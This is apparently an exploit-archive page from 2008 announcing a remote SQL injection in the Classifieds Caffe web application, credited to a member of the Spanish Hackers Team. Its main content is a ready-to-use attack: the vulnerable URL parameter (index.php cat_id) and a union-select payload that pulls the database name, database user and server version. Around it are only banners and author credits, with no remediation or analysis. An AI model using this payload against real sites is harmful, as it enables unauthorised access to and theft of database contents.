Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability
# Published : 2008-04-15
# Author : JosS
# Previous Title : XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability
# Next Title : LightNEasy SQLite / no database <= 1.2.2 Multiple Remote Vulnerabilities

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+               Classifieds Caffe (index.php cat_id) Remote SQL Injection            +==--
--==+====================================================================================+==--
                     [+] [JosS] + [Spanish Hackers Team] + [Sys - Project]

[+] Info:

[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com

[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*

--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+                                       JosS                                         +==--
--==+====================================================================================+==--
                                       [+] [The End]

# www.Syue.com [2008-04-15]